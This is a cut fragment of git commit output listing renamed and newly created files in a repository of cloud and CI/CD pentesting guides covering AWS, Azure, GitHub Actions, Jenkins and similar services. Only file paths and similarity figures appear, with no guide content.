{.gitbook/assets => src/images}/image (99).png (100%) rename {.gitbook/assets => src/images}/image.png (100%) rename {.gitbook/assets => src/images}/openshift-missing-service-account-image1.png (100%) rename {.gitbook/assets => src/images}/openshift-missing-service-account-image2.png (100%) create mode 100644 src/images/sponsor_8ksec.png create mode 100644 src/images/sponsor_hackenproof.jpeg create mode 100644 src/images/sponsor_intigriti.png create mode 100644 src/images/sponsor_pentesttools.webp create mode 100644 src/images/sponsor_rootedcon.png create mode 100644 src/images/sponsor_stm.png create mode 100644 src/images/sponsor_trickest.jpeg rename {.gitbook/assets => src/images}/telegram-cloud-document-4-5875069018120918586.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5780773316536156543-x.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5782633230648853886-y.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-5920521132757336440-y.jpg (100%) rename {.gitbook/assets => src/images}/telegram-cloud-photo-size-4-6044191430395675441-x.jpg (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/ansible-tower-awx-automation-controller-security.md (51%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/apache-airflow-security/README.md (69%) create mode 100644 src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/apache-airflow-security/airflow-rbac.md (68%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/atlantis-security.md (69%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/circleci-security.md (59%) create mode 100644 src/pentesting-ci-cd/cloudflare-security/README.md create mode 100644 src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md create mode 100644 src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md create mode 100644 src/pentesting-ci-cd/concourse-security/README.md create mode 100644 src/pentesting-ci-cd/concourse-security/concourse-architecture.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/concourse-security/concourse-enumeration-and-attacks.md (66%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/concourse-security/concourse-lab-creation.md (53%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/gitea-security/README.md (58%) create mode 100644 src/pentesting-ci-cd/gitea-security/basic-gitea-information.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/README.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/README.md (65%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-cache-poisoning.md (100%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/abusing-github-actions/gh-actions-context-script-injections.md (100%) create mode 100644 src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/github-security/basic-github-information.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/README.md (68%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/basic-jenkins-information.md (63%) create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/jenkins-security/jenkins-dumping-secrets-from-groovy.md (52%) create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md create mode 100644 src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/okta-security/README.md (66%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/okta-security/okta-hardening.md (73%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/pentesting-ci-cd-methodology.md (55%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/serverless.com-security.md (64%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/supabase-security.md (62%) rename {pentesting-ci-cd => src/pentesting-ci-cd}/terraform-security.md (72%) create mode 100644 src/pentesting-ci-cd/todo.md create mode 100644 src/pentesting-ci-cd/travisci-security/README.md rename {pentesting-ci-cd => src/pentesting-ci-cd}/travisci-security/basic-travisci-information.md (60%) create mode 100644 src/pentesting-ci-cd/vercel-security.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/README.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-basic-information/README.md (78%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-basic-information/aws-federation-abuse.md (53%) create mode 100644 src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/README.md (100%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-ecs-persistence.md (50%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md (65%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-ssm-perssitence.md (100%) create mode 100644 src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-persistence/aws-sts-persistence.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md (66%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md (74%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md (76%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md (60%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md (50%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md (70%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-cognito-privesc.md (82%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ec2-privesc.md (77%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ecs-privesc.md (75%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-efs-privesc.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-glue-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-iam-privesc.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-lambda-privesc.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md (60%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-rds-privesc.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-s3-privesc.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md (54%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-ssm-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md (71%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md (79%) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-api-gateway-enum.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cloudhsm-enum.md (78%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-directory-services-workdocs-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-dynamodb-enum.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md (76%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md (63%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-efs-enum.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-elastic-beanstalk-enum.md (57%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-iam-enum.md (66%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-lambda-enum.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-msk-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-redshift-enum.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-relational-database-rds-enum.md (53%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md (69%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md (81%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md (75%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md (73%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-ses-enum.md (61%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-services/aws-stepfunctions-enum.md (56%) create mode 100644 src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md (51%) create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md (50%) rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md (59%) create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md (68%) create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-basic-information/README.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-basic-information/az-tokens-and-public-applications.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-device-registration.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-enumeration-tools.md (68%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md (63%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md (59%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md (60%) create mode 100644 src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md (63%) create mode 100644 src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-persistence/README.md (53%) create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md create mode 100644 src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/README.md (100%) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-queue-post-exploitation.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-sql-post-exploitation.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/README.md (100%) create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-authorization-privesc.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-entraid-privesc/README.md (73%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md (67%) create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-functions-app-privesc.md (79%) create mode 100644 src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-queue-privesc.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-servicebus-privesc.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-sql-privesc.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-storage-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md (85%) create mode 100644 src/pentesting-cloud/azure-security/az-services/README.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-acr.md rename pentesting-cloud/azure-security/az-services/az-app-services.md => src/pentesting-cloud/azure-security/az-services/az-app-service.md (66%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-application-proxy.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-arm-templates.md rename {pentesting-cloud => 